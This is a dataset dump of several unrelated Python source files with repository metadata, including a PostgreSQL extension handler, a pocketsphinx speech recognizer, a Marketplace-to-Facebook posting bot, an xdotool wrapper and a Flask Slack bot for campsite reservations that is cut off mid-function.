def __init__(self, name, description, owner, schema, version=None,
oid=None):
"""Initialize the extension
:param name: extension name (from extlname)
:param description: comment text (from obj_description())
:param schema: schema name (from extnamespace)
:param owner: owner name (from rolname via extowner)
:param version: version name (from extversion)
"""
super(Extension, self).__init__(name, description)
self._init_own_privs(owner, [])
self.schema = schema
self.version = version
self.oid = oid
@staticmethod
def query(dbversion=None):
return """
SELECT e.extname AS name, n.nspname AS schema, e.extversion AS version,
r.rolname AS owner,
obj_description(e.oid, 'pg_extension') AS description, e.oid
FROM pg_extension e
JOIN pg_roles r ON (r.oid = e.extowner)
JOIN pg_namespace n ON (e.extnamespace = n.oid)
WHERE n.nspname != 'information_schema'
ORDER BY e.extname"""
@staticmethod
def from_map(name, inobj):
"""Initialize an Extension instance from a YAML map
:param name: extension name
:param inobj: YAML map of the extension
:return: extension instance
"""
return Extension(
name, inobj.pop('description', None), inobj.pop('owner', None),
inobj.get('schema'), inobj.pop('version', None))
def get_implied_deps(self, db):
"""Return the implied dependencies of the object
:param db: the database where this object exists
:return: set of `DbObject`
"""
deps = super(Extension, self).get_implied_deps(db)
if self.schema is not None:
s = db.schemas.get(self.schema)
if s:
deps.add(s)
return deps
@commentable
def create(self, dbversion=None):
"""Return SQL statements to CREATE the extension
:return: SQL statements
"""
opt_clauses = []
if self.schema is not None and self.schema not in (
'pg_catalog', 'public'):
opt_clauses.append("SCHEMA %s" % quote_id(self.schema))
if self.version is not None:
opt_clauses.append("VERSION '%s'" % self.version)
return ["CREATE EXTENSION %s%s" % (
quote_id(self.name), ('\n ' + '\n '.join(opt_clauses))
if opt_clauses else '')]
def alter(self, inobj, no_owner=True):
"""Generate SQL to transform an existing extension
:param inobj: a YAML map defining the new extension
:return: list of SQL statements
This exists because ALTER EXTENSION does not permit altering
the owner.
"""
return super(Extension, self).alter(inobj, no_owner=no_owner)
CORE_LANGS = [
"plpgsql",
"pltcl",
"pltclu",
"plperl",
"plperlu",
"plpythonu",
"plpython2u",
"plpython3u"]
class ExtensionDict(DbObjectDict):
"The collection of extensions in a database"
cls = Extension
def _from_catalog(self):
"""Initialize the dictionary of extensions by querying the catalogs"""
for obj in self.fetch():
self[obj.key()] = obj
self.by_oid[obj.oid] = obj
def from_map(self, inexts, newdb):
"""Initialize the dictionary of extensions by converting the input map
:param inexts: YAML map defining the extensions
:param newdb: dictionary of input database
"""
for key in inexts:
if not key.startswith('extension '):
raise KeyError("Unrecognized object type: %s" % key)
name = key[10:]
inobj = inexts[key]
self[name] = Extension.from_map(name, inobj)
if self[name].name in CORE_LANGS:
lang = {'language %s' % self[name].name: {
'_ext': 'e', 'owner': self[name].owner}}
newdb.languages.from_map(lang)
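# Illustrative YAML shape consumed by ExtensionDict.from_map above (a sketch
# based on the keys read by Extension.from_map; the values are placeholders):
#
#   extension plpgsql:
#     schema: pg_catalog
#     owner: postgres
#     version: '1.0'
#     description: PL/pgSQL procedural language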
| UTF-8 | Python | false | false | 4,528 | py | 132 | extension.py | 83 | 0.576634 | 0.57553 | 0 | 137 | 32.051095 | 83 |
Moeinh77/pyERA | 10,136,122,829,274 | 60e443d44f6a37bb825a70142a66a500db3a9235 | e300c72f9641743ca610703b5fec141b978374da | /examples/ex_icub_trust_cognitive_architecture/speech_recognition.py | 2948b407d83f2244d3fd900ca57017d548e845ff | [
"MIT"
]
| permissive | https://github.com/Moeinh77/pyERA | 7db4403081944417f1f1f487be5b808b0c87b9d2 | 9597fb0b234e6ad212f768b0bc47bb84ba4bd50e | refs/heads/master | 2020-05-31T09:56:00.917967 | 2019-04-22T13:10:49 | 2019-04-22T13:10:49 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/python
# The MIT License (MIT)
#
# Copyright (c) 2017 Massimiliano Patacchiola
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# Implementation of pocketsphinx Speech Recognition based on a grammar.
# It requires a dictionary of world and a grammar file. There are also
# methods for audio recording (based on linux arecord) and file format
# conversion (based on linux sox, lame, oggenc)
from pocketsphinx.pocketsphinx import *
from sphinxbase.sphinxbase import *
import os
class SpeechRecognizer:
"""
    Sphinx is based on some standard files that it is necessary to provide:
    1- JSpeech Grammar Format (JSGF): a platform-independent, vendor-independent textual representation of
grammars for use in speech recognition. Grammars are used by speech recognizers to determine
what the recognizer should listen for, and so describe the utterances a user may say.
JSGF adopts the style and conventions of the Java Programming Language in addition to use of
traditional grammar notations.
Example:
grammar hello;
public <greet> = (good morning | hello) ( bhiksha | evandro | paul | philip | rita | will );
http://cmusphinx.sourceforge.net/doc/sphinx4/edu/cmu/sphinx/jsgf/JSGFGrammar.html
2- A dictionary of allowed words, all the words used in the grammar must be present in this file.
3- The model for the language, the Pocketsphinx default en-us folder is a good choice.
"""
def __init__(self, hmm_path, language_model_path, dictionary_path, grammar_path, rule_name, fsg_name):
"""Initiliase a SpeechDetector object. It requires a grammar in order to work.
@param hmm_path: the hidden markov model path
@param language_model_path: the language model path (.bin)
@param dictionary_path: the path to the dictionary used (.dic)
@param grammar_path: path to the grammar file (.gram)
@param rule_name: the rule to pick up from the grammar file
@param fsg_name: the fsg name (can be something like: mygrammar)
"""
# Create a decoder with certain model
config = Decoder.default_config()
config.set_string('-hmm', hmm_path)
#config.set_string('-lm', path.join(data_path, 'turtle.lm.bin')) #language model
config.set_string('-lm', language_model_path)
config.set_string('-dict', dictionary_path) #dictionary
self.decoder = Decoder(config)
# Switch to JSGF grammar
jsgf = Jsgf(grammar_path)
rule = jsgf.get_rule(rule_name)
fsg = jsgf.build_fsg(rule, self.decoder.get_logmath(), 7.5)
fsg.writefile(fsg_name + '.fsg')
self.decoder.set_fsg(fsg_name, fsg)
self.decoder.set_search(fsg_name)
def record_audio(self, destination_path, seconds=3, extension='ogg', harddev='wav'):
"""Record an audio file for the amount of time specified.
        It requires the following packages to be installed:
oggenc: sudo apt-get install vorbis-tools
lame: sudo apt-get install lame
        @param destination_path: the path where the audio file is saved
@param seconds: time in seconds
@param extension: the extension of the produced file (mp3, ogg, wav)
@param harddev: to see all the microphones on your laptop type "arecord --list-devices"
this parameter must be a string containing 'card,device' returned by the command above.
e.g. card 3: AK5371 [AK5371], device 0: USB Audio [USB Audio]
For this microphone the harddev parameter must be: '3,0'
@return: the path to the file created or an empty string in case of errors
"""
if harddev == '':
if extension == 'mp3':
command = "arecord -f cd -d " + str(seconds) + " -t raw | lame -x -r - " + destination_path
elif extension == 'ogg':
command = "arecord -f cd -d " + str(seconds) + " -t raw | oggenc - -r -o " + destination_path
elif extension == 'wav':
command = "arecord -f cd -d " + str(seconds) + " " + destination_path
else:
if extension == 'mp3':
command = command = "arecord -f cd -D hw:" + str(harddev) + " -d " + str(seconds) + " -t raw | lame -x -r - " + destination_path
elif extension == 'ogg':
command = "arecord -f cd -D hw:" + str(harddev) + " -d " + str(seconds) + " -t raw | oggenc - -r -o " + destination_path
elif extension == 'wav':
command = "arecord -f cd -D hw:" + str(harddev) + " -d " + str(seconds) + " " + destination_path
        returned = -1
        try:
            returned = os.system(command)
        except:
            print("Exception when executing arecord command to record audio.")
if returned == 0:
return destination_path
else:
print("[SPEECH RECOGNITION][ERROR] problem with arecord command, check if extension and harddev are correct.")
return ''
def convert_to_raw(self, file_name, file_name_raw="./audio.raw", extension='wav'):
""" It uses linux 'sox' to convert an mp3 file to raw file.
It is necessary to convert to raw before passing the file to other methods
@param extension: the extension of the input file (wav, mp3)
@param file_name: The path to the file to convert
@param file_name_raw: The path and file name (.raw) for the file produced
@return: the path to the raw file created
"""
        # Before processing, the audio must be converted to a PCM format. The
        # recommended format is 16khz 16bit little-endian mono. If you are
        # decoding telephone quality audio you can also decode 8khz 16bit
        # little-endian mono, but you usually need to reconfigure the decoder
        # to accept 8khz input. For example, pocketsphinx has a -samprate 8000
        # option in its configuration.
# E.g. use sox to convert mp3 to raw file: sox input.mp3 output.raw rate 16000
# sox --endian little --bits 16000 member.mp3 member.raw rate 16000 channels 1
if extension == 'mp3':
os.system("sox --endian little --bits 16000 " + file_name + " '" + file_name_raw + "' rate 16000 channels 1")
elif extension == 'wav':
os.system("sox " + file_name + " " + file_name_raw + " rate 16000 channels 1")
return file_name_raw
def return_text_from_audio(self, file_name):
"""Given an audio file in raw extension returns the text.
@param file_name: audio file in .raw extension
@return: the text (string) decoded or an empty string if nothing is found
"""
string_to_return = ""
self.decoder.start_utt()
try:
stream = open(file_name, 'rb')
except IOError:
print("[SPEECH RECOGNITION][ERROR] Could not find the audio file :" + str(file_name))
while True:
buf = stream.read(1024)
if buf:
self.decoder.process_raw(buf, False, False)
else:
break
try:
self.decoder.end_utt()
string_to_return = self.decoder.hyp().hypstr
except:
print("[SPEECH RECOGNITION][ERROR] The audio file does not respect the grammar rules")
return string_to_return
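# Minimal usage sketch. All paths and names below are assumptions -- point them
# at your own pocketsphinx acoustic model, language model, dictionary and JSGF
# grammar before running.
if __name__ == "__main__":
    recognizer = SpeechRecognizer(hmm_path="/usr/local/share/pocketsphinx/model/en-us/en-us",
                                  language_model_path="./en-us.lm.bin",
                                  dictionary_path="./commands.dic",
                                  grammar_path="./commands.gram",
                                  rule_name="commands.rule",
                                  fsg_name="commands")
    audio_file = recognizer.record_audio("./utterance.wav", seconds=3,
                                         extension="wav", harddev="")
    raw_file = recognizer.convert_to_raw(audio_file, "./utterance.raw",
                                         extension="wav")
    print(recognizer.return_text_from_audio(raw_file))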
| UTF-8 | Python | false | false | 8,346 | py | 27 | speech_recognition.py | 24 | 0.647017 | 0.637191 | 0 | 160 | 51.1625 | 145 |
Polarts/UEMarketplaceAlertsBot | 9,216,999,834,992 | ce4443548013e3c8d85a483bf9c6e8c78be31c04 | 7d6a9e5dbbecd69c33b2e6c42ce2fd3c5057b715 | /bot/functions.py | c74e53ac8d04c4eb3393ab241e19ef93bed6e20b | [
"MIT"
]
| permissive | https://github.com/Polarts/UEMarketplaceAlertsBot | 2d81f26b4bb3fefc8506a3a49f7b094e397e4532 | 5f32690e64cf8ac582427f99e8669f1e716f818d | refs/heads/main | 2023-08-15T11:21:56.535797 | 2021-09-28T09:43:28 | 2021-09-28T09:43:28 | 405,038,207 | 1 | 0 | MIT | false | 2021-09-24T10:22:37 | 2021-09-10T10:11:59 | 2021-09-23T06:31:46 | 2021-09-24T10:22:37 | 40 | 0 | 0 | 0 | Python | false | false | import functools
import json
import os
from typing import Sequence
import requests
import facebook
from datetime import datetime, timezone
from bs4 import BeautifulSoup
from django.utils import timezone
from .models import AppState, AssetSource, Asset, LogEntry
BASE_URL = 'https://www.unrealengine.com'
def seed_database():
AppState.objects.create(
play_state=AppState.PlayStates.PLAY,
health_state=AppState.HealthStates.PENDING,
last_posted=timezone.now()
)
AssetSource.objects.create(
title='Free Monthly',
type=AssetSource.SourceTypes.SCRAPE,
post_title='New free monthly assets out now:',
url='/marketplace/en-US/assets?tag=4910'
)
AssetSource.objects.create(
title='Megascans',
type=AssetSource.SourceTypes.JSON,
post_title='New free megascans available:',
url='/marketplace/api/assets/seller/Quixel+Megascans?lang=en-US&start=0&count=20&sortBy=effectiveDate&sortDir=DESC&priceRange=[0,0]'
)
def append_log(source, type, text):
LogEntry(
time_stamp=timezone.now(),
source=source,
type=type,
text=text
).save()
status = AppState.objects.get(pk=1)
if type == LogEntry.LogEntryTypes.LOG and status.health_state == 'PEND':
status.health_state = 'GOOD'
if type == LogEntry.LogEntryTypes.ERR:
status.health_state = 'BAD'
status.play_state = 'STOP'
status.save()
def get_new_session():
session = requests.Session()
return session
def get_json_assets(session: requests.Session, source: AssetSource):
if source.is_discontinued: return []
request = session.get(BASE_URL + source.url)
response = json.loads(request.text)
json_assets = None
asset_array = []
try:
source.is_discontinued = response['data']['sellerProfile']['isDiscontinued']
source.save()
if (source.is_discontinued):
append_log(
source='get_json_assets',
type=LogEntry.LogEntryTypes.WARN,
text=f'Asset source {source.title} has been discontinued!'
)
return asset_array
except: pass
try:
json_assets = response['data']['elements']
except KeyError:
append_log(
source='get_json_assets',
type=LogEntry.LogEntryTypes.ERR,
text=f'Failed to parse JSON[data][elements] from {source.title}, raw: {response}'
)
return asset_array
for asset in json_assets:
title = asset['title']
        # Concatenate the category names into a single description string.
        description = functools.reduce(
lambda a, b: { 'desc': a['desc'] + b['name'] },
asset['categories'],
{'desc': ''}
)['desc']
link = BASE_URL +'/marketplace/en-US/product/' + asset['urlSlug']
try:
asset_array.append(Asset(
title=title,
description=description,
link=link,
source=source
))
except TypeError:
append_log(
source='get_json_assets',
type=LogEntry.LogEntryTypes.ERR,
text="An error occured while creating Asset from the following: "+title+", "+link+", "+description
)
return asset_array
def scrape_assets(session: requests.Session, source: AssetSource):
request = session.get(BASE_URL + source.url)
response = BeautifulSoup(request.text, 'lxml')
scraped_assets = response.select('article.asset')
asset_array = []
for asset in scraped_assets:
h3a = asset.select('h3 a')[0]
title = h3a.text
categories = asset.select('.details .categories')
description = ''
for i in range(len(categories)):
cat_item = categories[i].select('.mock-ellipsis-item-cat')
if len(cat_item) > 0:
description += cat_item[0].text + (',' if i < len(categories)-1 else '')
link = BASE_URL + h3a['href']
try:
asset_array.append(Asset(
title=title,
description=description,
link=link,
source=source
))
except TypeError:
append_log(
source='scrape_assets',
type=LogEntry.LogEntryTypes.ERR,
text="An error occured while creating Asset from the following: "+title+", "+link+", "+description
)
return asset_array
def persist_new_assets(assets: Sequence[Asset]):
new_assets = 0
for asset in assets:
try:
existing_asset = Asset.objects.get(title__exact=asset.title)
append_log(
source='persist_new_assets',
type=LogEntry.LogEntryTypes.LOG,
text='Asset already exists: ' + asset.title
)
if not existing_asset.sent:
new_assets += 1
except Asset.DoesNotExist:
asset.time_stamp = timezone.now()
asset.sent = False
asset.save()
append_log(
source='persist_new_assets',
type=LogEntry.LogEntryTypes.LOG,
text='New asset added: ' + asset.title
)
new_assets += 1
return new_assets
def post_new_assets(title, debug=False):
assets = Asset.objects.filter(sent=False)
# prepare message for posting
message = title + '\n\n' \
+ functools.reduce(
lambda a, b: {'message': a['message'] + b.title + '\n[' + b.description + ']\n' + b.link + '\n\n'},
assets,
{'message': ''}
)['message']
if debug:
return message
else:
try:
fb_key = os.environ['FB_API_KEY']
page_id = os.environ['PAGE_ID']
graph = facebook.GraphAPI(access_token=fb_key, version='3.1')
api_request = graph.put_object(
parent_object=page_id,
connection_name='feed',
message=message
)
if 'id' in api_request:
append_log(
source='post_new_assets',
type=LogEntry.LogEntryTypes.LOG,
text='Successfully posted on facebook!'
)
for asset in assets:
asset.sent = True
asset.save()
except facebook.GraphAPIError as e:
append_log(
source='post_new_assets',
type=LogEntry.LogEntryTypes.ERR,
text="facebook.GraphAPIError: " + e.__str__()
)
except KeyError as e:
append_log(
source='post_new_assets',
type=LogEntry.LogEntryTypes.ERR,
text="KeyError: " + e.__str__()
)
def run_bot(status, debug=False):
if status.play_state == 'PLAY':
status.last_run = datetime.now()
status.save()
append_log('run_bot', 0, f'Running bot at {status.last_run}')
session = get_new_session()
sources = AssetSource.objects.all()
for source in sources:
assets = []
if (source.type == AssetSource.SourceTypes.SCRAPE):
assets = scrape_assets(session, source)
else:
assets = get_json_assets(session, source)
new_assets = persist_new_assets(assets)
append_log('run_bot', 0, f'There are {new_assets} new assets')
if new_assets > 0:
result = post_new_assets(source.post_title, debug)
if debug:
return result
else:
append_log('run_bot', 0, 'Bot did not run because it\'s on STOP')
return 'Bot is on STOP!'
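# Typical invocation sketch (an assumption about deployment: the module is
# imported from a Django project and driven periodically, e.g. by a management
# command or a scheduler):
#
#   from bot import functions
#   functions.seed_database()                        # one-time setup
#   functions.run_bot(AppState.objects.get(pk=1))    # run every few minutes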
| UTF-8 | Python | false | false | 8,124 | py | 25 | functions.py | 13 | 0.529542 | 0.526096 | 0 | 254 | 29.984252 | 140 |
NISH1001/youtube-pauser | 7,241,314,911,170 | 3899226245fd717a4108ea98dd0be98c26f7ace2 | b4a29c887ba71677c6f7eccf7e587dad6627aa4f | /xdotool.py | 2ec63e835017ecd7cdb29d43f72f3192199d4479 | []
| no_license | https://github.com/NISH1001/youtube-pauser | edd36c85fd766c0f3dc6004c27224a500c8a344b | cf0c21d600928e91e2825ab0c17211a59c8805c1 | refs/heads/master | 2021-01-23T09:35:35.119068 | 2017-09-07T11:21:35 | 2017-09-07T11:21:35 | 102,584,205 | 3 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/env python3
"""
A wrapper over Linux's xdotool
"""
from sysutils import exe
def get_window_name(id):
"""
Fetch name of the window with corresponding id
"""
command = "xdotool getwindowname {}".format(id)
output, error = exe(command)
return output.strip()
def get_window_active():
"""
Fetch id of the currently active window
"""
output, error = exe("xdotool getactivewindow")
return output
def search_window_class(class_name):
"""
Search all the windows with class name
Eg: xdotool search --class Chromium
"""
command = "xdotool search --class {}".format(class_name)
output, error = exe(command)
return output.split()
def activate_window(id):
"""
Focus the window
"""
command = "xdotool windowactivate {}".format(id)
output, error = exe(command)
return output
def send_keys(*args):
key = '+'.join(args)
command = "xdotool key --clearmodifiers {}".format(key)
output, error = exe(command)
return output
def sleep(sec):
command = "xdotool sleep".format(sec)
output, error = exe(command)
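# Illustrative composition of the wrappers above (a sketch: assumes a running
# Chromium window whose focused tab is YouTube, where 'k' toggles play/pause):
#
#   for window_id in search_window_class("Chromium"):
#       activate_window(window_id)
#       send_keys("k")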
def main():
pass
if __name__ == "__main__":
main()
| UTF-8 | Python | false | false | 1,209 | py | 6 | xdotool.py | 4 | 0.615385 | 0.614557 | 0 | 55 | 20.963636 | 60 |
jacobstr/crusher | 9,912,784,563,453 | 6e29f5bf337aa67f1f2f4e149dcec62cd7994358 | 49719e9882fae16e20df64c142e11d882ca1dccb | /server/app.py | f297b0bcd820de942679f01bb00894213c75ff54 | []
| no_license | https://github.com/jacobstr/crusher | 27cac8fce9c0fb20f23df3e83faf08fad7bf7b60 | a09d67d666f18fcac66d956f7bfcaf3b3346260c | refs/heads/master | 2023-02-06T22:11:04.370165 | 2022-10-19T15:24:22 | 2022-10-19T15:24:22 | 150,933,573 | 2 | 5 | null | false | 2023-02-02T06:16:01 | 2018-09-30T05:26:19 | 2022-11-03T15:21:23 | 2023-02-02T06:15:59 | 147 | 3 | 5 | 8 | Python | false | false | import hashlib
import hmac
import itertools
import json
import logging
import os
import random
import shelve
import textwrap
import arrow
import flask
import humanhash
from slackclient import SlackClient
logging.basicConfig(level=logging.DEBUG)
LOGGER = logging.getLogger(__name__)
app = flask.Flask(__name__)
#: Url format for HTTP api requests to recreation.gov for a given campsite id.
CAMPGROUND_URL = "https://www.recreation.gov/camping/campgrounds/{id}"
#: Maps known general camping areas to reserve-america-scraper
#: campground names.
CAMPGROUNDS = [
{
"short_name": "Upper Pines",
"name": "UPPER_PINES",
"id": "232447",
"tags": ["yosemite-valley", "yosemite"],
"tz": "US/Pacific",
},
{
"short_name": "Lower Pines",
"name": "LOWER_PINES",
"id": "232450",
"tags": ["yosemite-valley", "yosemite"],
"tz": "US/Pacific",
},
{
"short_name": "North Pines",
"name": "NORTH_PINES",
"id": "232449",
"tags": ["yosemite-valley", "yosemite"],
"tz": "US/Pacific",
},
{
"short_name": "Dry Gulch",
"name": "DRY_GULCH",
"id": "233842",
"tags": ["yosemite"],
"tz": "US/Pacific",
},
{
"short_name": "Tuolumne Meadows",
"name": "TUOLOUMME",
"id": "232448",
"tags": ["yosemite", "tuolumne"],
"tz": "US/Pacific",
},
{
"short_name": "Crane Flat",
"name": "CRANE_FLAT",
"id": "232452",
"tags": ["yosemite"],
"tz": "US/Pacific",
},
{
"short_name": "Hodgdon Meadow",
"name": "HODGDON_MEADOW",
"id": "232451",
"tags": ["yosemite"],
"tz": "US/Pacific",
},
{
"short_name": "Dirt Flat",
"name": "DIRT_FLAT",
"id": "233839",
"tags": ["yosemite"],
"tz": "US/Pacific",
},
{
"short_name": "Tuolumne Meadows",
"name": "TOULUMNE_MEADOWS",
"id": "232448",
"tags": ["yosemite", "tuolumne"],
"tz": "US/Pacific",
},
{
"short_name": "Kalaloch",
"name": "KALALOCH",
"id": "232464",
"tags": ["mt-olympic"],
"tz": "US/Pacific",
},
{
"short_name": "Sol Duc",
"name": "SOL_DUC",
"id": "251906",
"tags": ["mt-olympic"],
"tz": "US/Pacific",
},
{
"short_name": "Point Reyes National Seashore",
"name": "POINT_REYES",
"id": "233359",
"tags": ["point-reyes"],
"tz": "US/Pacific",
},
{
"short_name": "Cottonwood",
"name": "COTTONWOOD",
"id": "272299",
"tags": ["jtree"],
"tz": "US/Pacific",
},
{
"short_name": "Jumbo Rocks",
"name": "JUMBO_ROCKS",
"id": "272300",
"tags": ["jtree"],
"tz": "US/Pacific",
},
{
"short_name": "Indian Cove",
"name": "INDIAN_COVE",
"id": "232472",
"tags": ["jtree"],
"tz": "US/Pacific",
},
{
"short_name": "Black Rock",
"name": "BLACK_ROCK",
"id": "232473",
"tags": ["jtree"],
"tz": "US/Pacific",
},
{
"short_name": "St. Mary",
"name": "ST_MARY",
"id": "232492",
"tags": ["gnp"],
"tz": "US/Mountain",
},
{
"short_name": "Fish Creek",
"name": "FISH_CREEK",
"id": "232493",
"tags": ["gnp"],
"tz": "US/Mountain",
},
{
"short_name": "Many Glacier",
"name": "MANY_GLACIER",
"id": "251869",
"tags": ["gnp"],
"tz": "US/Mountain",
},
{
"short_name": "Colter Bay",
"name": "COLTER_BAY",
"id": "258830",
"tags": ["teton"],
"tz": "US/Mountain",
},
{
"short_name": "Jenny Lake",
"name": "JENNY_LAKE",
"id": "247664",
"tags": ["teton"],
"tz": "US/Mountain",
},
{
"short_name": "South Campground",
"name": "SOUTH_CAMPGROUND",
"id": "272266",
"tags": ["zion"],
"tz": "US/Central",
},
{
"short_name": "Watchman Campground",
"name": "WATCHMAN_CAMPGROUND",
"id": "232445",
"tags": ["zion"],
"tz": "US/Central",
},
]
#: Known campground tags formed via a superset of all tags in the CAMPGROUNDS
#: collection defined above. CAMPGROUNDS is the authoritative source for this
#: data.
CAMPGROUND_TAGS = list(set(itertools.chain.from_iterable([cg['tags'] for cg in CAMPGROUNDS])))
#: The API token for the slack bot can be obtained via:
#: https://api.slack.com/apps/AD3G033C4/oauth?
SLACK_API_KEY = os.getenv('SLACK_API_KEY')
#: Shared secret used to sign requests.
SLACK_SIGNING_SECRET = os.getenv('SLACK_SIGNING_SECRET')
#: In addition to @messaging the user that registered the watcher,
#: the bot will also message this public channel.
PUBLIC_RESULTS_CHANNEL = "campsites"
#: This should match the name of the application, using a different name
#: is a from of masquerading and may require additional permissions.
BOT_NAME = "CrusherScrape"
#: The path to the watcher database.
REPO_PATH = os.getenv('CRUSHER_REPO_PATH', '/tmp/crusher.db')
class WatchersRepo(object):
"""
    Ghetto jank interface around our mega-lame disk-based database. We store
    reservations as a list instead of a dict because the assumption is this
    thing will not get very large - in fact we'll probably enforce it - and it
    seemed appropriate that the contents should be ordered.
"""
KEY = 'watchers'
def __init__(self, path):
self.path = path
def _set(self, data):
s = shelve.open(self.path, writeback=True)
try:
s[self.KEY] = data
finally:
s.close()
def list(self):
s = shelve.open(self.path)
try:
watchers = s[self.KEY]
except KeyError:
return []
finally:
s.close()
return watchers
def remove(self, watcher_id):
watchers = [x for x in self.list() if x['id'] != watcher_id]
self._set(watchers)
return watchers
def get(self, watcher_id):
watchers = [x for x in self.list() if x['id'] == watcher_id]
if len(watchers) > 0:
return watchers[0]
else:
return None
def update(self, watcher):
watchers = self.list()
for i, w in enumerate(watchers):
if w['id'] == watcher['id']:
watchers[i] = watcher
break
self._set(watchers)
def append(self, watcher):
watchers = self.list()
watchers.append(watcher)
self._set(watchers)
#: Global disk-based database of watcher registrations.
WATCHERS = WatchersRepo(REPO_PATH)
def random_id():
return humanhash.humanize(hashlib.md5(os.urandom(32)).hexdigest())
def make_watcher(user_id, campground, start, length):
return {
"id": random_id(),
"user_id": user_id,
"campground": campground,
"start": start,
"length": length,
"silenced": False,
}
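# Example record produced by make_watcher and stored via WATCHERS.append()
# (the id shown is a made-up humanhash; `start` uses the DD/MM/YY format that
# the slash command below accepts):
#   {"id": "alpha-sierra-papa-echo", "user_id": "U123ABC",
#    "campground": "yosemite", "start": "01/06/19", "length": 3,
#    "silenced": False}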
def add_watcher(user_id, campground, start, length):
if campground not in CAMPGROUND_TAGS:
return flask.jsonify({
"response_type": "ephemeral",
"text": "Unknown camping area, please select one of {}".format(
', '.join(CAMPGROUND_TAGS),
)
})
WATCHERS.append(make_watcher(
user_id,
campground,
start,
length,
))
return flask.jsonify({
"text": "Thanks <@{}>, I've registered your reservation request for *{}*.".format(
user_id,
campground,
)
})
@app.route('/meta/campgrounds')
def meta_campgrounds():
return flask.jsonify(CAMPGROUNDS)
@app.route('/meta/tags')
def meta_campground_tags():
return flask.jsonify(CAMPGROUND_TAGS)
@app.route('/watchers')
def watchers_list():
return flask.jsonify(WATCHERS.list())
@app.route('/watchers/<watcher_id>')
def watchers_get(watcher_id):
return flask.jsonify(WATCHERS.get(watcher_id))
@app.route('/watchers/<watcher_id>/delete', methods=['POST'])
def watchers_delete(watcher_id):
return flask.jsonify(WATCHERS.remove(watcher_id))
def results_changed(old, new):
# Hackish way to compare two lists.
return json.dumps(old) != json.dumps(new)
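# e.g. results_changed([{"site": "A1"}], []) -> True, while two lists with the
# same contents serialize to identical JSON strings and compare equal.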
@app.route('/watchers/<watcher_id>/results', methods=['POST'])
def watchers_results(watcher_id):
watcher = WATCHERS.get(watcher_id)
old_results = watcher.get('results', [])
#: Trusting random input from the internet here.
results = flask.request.get_json()
watcher['results'] = results
WATCHERS.update(watcher)
has_changed = results_changed(old_results, results)
if len(results) and not watcher.get('silenced') and has_changed:
slack = SlackClient(SLACK_API_KEY)
resp = slack.api_call(
"chat.postMessage",
username=BOT_NAME,
text="New campsites available!",
channel=watcher['user_id'],
attachments=make_results_attachments(results),
)
return flask.jsonify(watcher)
def slack_list_watchers(user_id=None):
watchers = WATCHERS.list()
if user_id:
watchers = [watcher for watcher in WATCHERS.list() if watcher['user_id'] == user_id]
if len(watchers):
return flask.jsonify({
"response_type": "in_channel",
"attachments": make_watcher_attachments(watchers),
})
else:
return flask.jsonify({
"response_type": "in_channel",
"text": "No active watchers at the moment!",
})
def slack_list_campgrounds(tags):
cgs = []
for cg in CAMPGROUNDS:
# Check intersection if tags is non-empty.
if tags and not set(tags) & set(cg['tags']):
continue
cgs.append({
"fallback": "Campground metadata",
"mrkdwn_in": ["text"],
"title": cg['short_name'],
"title_link": CAMPGROUND_URL.format(id=cg['id']),
"fields": [
{
"title": "tags",
"value": ", ".join(cg['tags']),
"short": True,
},
],
})
if cgs:
return flask.jsonify({
"response_type": "in_channel",
"text": "Campgrounds",
"attachments": cgs,
})
else:
return flask.jsonify({
"response_type": "in_channel",
"text": "No campgrounds match the given tags.",
})
@app.route('/slack/actions', methods=['POST'])
def slack_actions():
payload = json.loads(flask.request.values['payload'])
if payload['callback_id'] != 'watcher_manage':
return flask.jsonify({"text":"Sorry, I didn't get that!"})
action = payload['actions'][0]
# Sample payload: see contrib/sample_action_payload.json
if action['name'] == 'cancel':
WATCHERS.remove(action['value'])
return slack_list_watchers()
if action['name'] == 'results':
watcher = WATCHERS.get(action['value'])
return flask.jsonify({
"text": "Results for {} on {}".format(watcher['campground'], watcher['start']),
"attachments": make_results_attachments(watcher['results']),
})
if action['name'] == 'silence':
watcher = WATCHERS.get(action['value'])
watcher['silenced'] = True
WATCHERS.update(watcher)
return flask.jsonify({
"text": "Silenced watcher, will no longer message <@{}>!".format(watcher['user_id']),
})
if action['name'] == 'unsilence':
watcher = WATCHERS.get(action['value'])
watcher['silenced'] = False
WATCHERS.update(watcher)
return flask.jsonify({
"text": "Unsilenced watcher, will now message <@{}> with results!".format(watcher['user_id']),
})
else:
return flask.jsonify({"text":"Sorry, I didn't get that!"})
@app.route('/slack/commands', methods=['POST'])
def slack_slash_commands():
"""
Handles responding to slash commands for reservations.
Commands:
/crush watch <campground-tag> <DD/MM/YY> <length>
------------------------------------------------------
Registers a new watcher for a reservation. This will begin a periodic
    scraping process against the recreation.gov website. When successful we'll
send you a slack message with results.
Campgrounds are selected according to `campground-tag` you provide. The bot
will attempt to find sites within any campground that matches the tag you
provide.
To list campgrounds and their tags, use the `campgrounds` command.
/crush list
----------------------
Lists active watchers for the current user.
/crush list-all
----------------------
Lists active watchers for all users.
/crush campgrounds [tags...]
------------------
Lists known campgrounds, optionally filtered by those that match any of the
provided tags. For example, if you wish to list what the bot considers
a 'yosemite-valley' campground use `/crush campgrounds yosemite-valley`.
Syntax:
- Square brackets, as in `[param]`, denote optional parameters.
- Angle brackets, as in `<param>`, denote required parameters.
- Ellipsis, `...` following a parameter denote a space-separated list.
"""
raw_data = flask.request.get_data()
if not verify_slack_request(
flask.request.headers['X-Slack-Signature'],
